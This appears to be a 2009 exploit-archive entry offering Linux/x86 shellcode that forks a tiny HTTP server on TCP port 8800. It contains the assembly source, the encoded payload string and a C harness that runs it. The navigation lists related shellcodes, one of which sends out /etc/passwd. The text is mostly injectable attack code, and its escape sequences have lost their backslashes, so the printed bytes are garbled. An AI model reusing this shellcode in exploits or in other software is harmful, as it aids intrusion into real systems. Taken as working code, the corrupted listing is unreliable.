[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes
# Published : 2009-09-15
# Author : XenoMuta
# Previous Title : freebsd/x86 connect back.send.exit /etc/passwd 112 bytes
# Next Title : linux/x86 listens for shellcode on tcp/5555 and jumps to it


/*
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ / __ / __ / /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|____/_/ /_/____/_/  /_/__,_/__/__,_/

 xenomutax40phreakerx2enet
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 Description:
 a linux/x86 shellcode that forks a HTTP Server on port tcp/8800

 OS: Linux
 Arch: x86
 Length: 166 bytes
 Author: XenoMuta

 hola at:
  str0k3, garay, fr1t0l4y, emra.
  - God bless you all -
 
==== SOURCE CODE ====
.globl _start
_start:
	xor %eax, %eax
	mov $0x02, %al
	int $0x80
	test %eax, %eax
	jz socket
	xor %eax, %eax
	incb %al
	int $0x80
txt:
	pop %ecx
	movb $27, %dl
	int $0x80

close:
	movb $0x6, %al
	mov %esi, %ebx
	int $0x80

exit:
	mov $0x01, %al
	xor %ebx, %ebx
	int $0x80

socketcall:
	pop %esi
	mov $0x66, %al
	incb %bl
	mov %esp, %ecx
	int $0x80
	jmp *%esi

socket:
	cltd
	xor %eax, %eax
	xor %ebx, %ebx
	push $0x6
	push $0x1
	push $0x2
	call socketcall

bind:
	mov %eax, %edi
	xor %edx, %edx
	push %edx
	pushw $0x6022
	pushw %bx
	mov %esp, %ecx
	push $0x10
	push %ecx
	push %edi
	call socketcall

listen:
	inc %bl
	push $0x05
	push %edi
	call socketcall

accept:
	xor %ecx, %ecx
	push %edx
	push %edx
	push %edi
	call socketcall
	
fork:
	mov %eax, %esi
	xor %eax, %eax
	mov $0x02, %al
	int $0x80
	test %eax, %eax
	jz write

	xor %eax, %eax
	mov $0x06, %al
	mov %esi, %ebx
	int $0x80

	xor %eax, %eax
	xor %ebx, %ebx
	mov $0x04, %bl
	jmp accept

write:
	mov %esi, %ebx
	mov $0x04, %al
	call txt
	.string "HTTP/1.0 200rnrn<h1>:)</h1>"
==== SOURCE CODE ====
*/
char shellcode[] = "x31xc0xb0x02xcdx80x85xc0x74x22x31xc0xfexc0xcdx80x59xb2x1bxcdx80xb0x06x89xf3xcdx80xb0x01x31xdbxcdx80x5exb0x66xfexc3x89xe1xcdx80xffxe6x99x31xc0x31xdbx6ax06x6ax01x6ax02xe8xe5xffxffxffx89xc7x31xd2x52x66x68x22x60x66x53x89xe1x6ax10x51x57xe8xcfxffxffxffxfexc3x6ax05x57xe8xc5xffxffxffx31xc9x52x52x57xe8xbbxffxffxffx89xc6x31xc0xb0x02xcdx80x85xc0x74x10x31xc0xb0x06x89xf3xcdx80x31xc0x31xdbxb3x04xebxdax89xf3xb0x04xe8x85xffxffxffx48x54x54x50x2fx31x2ex30x20x32x30x30x0dx0ax0dx0ax3cx68x31x3ex3ax29x3cx2fx68x31x3e";

int main ()
{
	printf("Length: %d bytesn", strlen(shellcode));
	int (*sc)() = (int (*)())shellcode;
	sc();
	return 0;
}

// www.Syue.com [2009-09-15]